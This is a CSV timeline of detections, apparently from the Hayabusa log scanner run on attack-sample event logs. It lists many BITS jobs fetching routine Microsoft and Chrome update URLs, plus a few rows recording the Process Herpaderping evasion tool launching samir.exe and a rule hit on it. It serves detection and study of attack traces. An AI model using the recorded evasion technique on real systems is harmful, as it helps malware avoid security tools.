2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-27 19:17:18.369 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\samir.exe | Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | PID: 21756 | PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
2020-10-27 19:17:18.377 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | Tgt Process: samir.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 21756 | Src PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418 | Tgt PID: 21048 | Tgt PGUID: 00247C92-F3AE-5F97-0000-00104EBD0418,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: "".\samir.exe"" | Process: C:\Users\bouss\Downloads\samir.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe | LID: 0x1478dc6e | PID: 21048 | PGUID: 00247C92-F3AE-5F97-0000-00104EBD0418",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe | URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 20:03:05.093 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-08 00:36:30.267 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-11 21:51:23.040 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.752 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe | URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
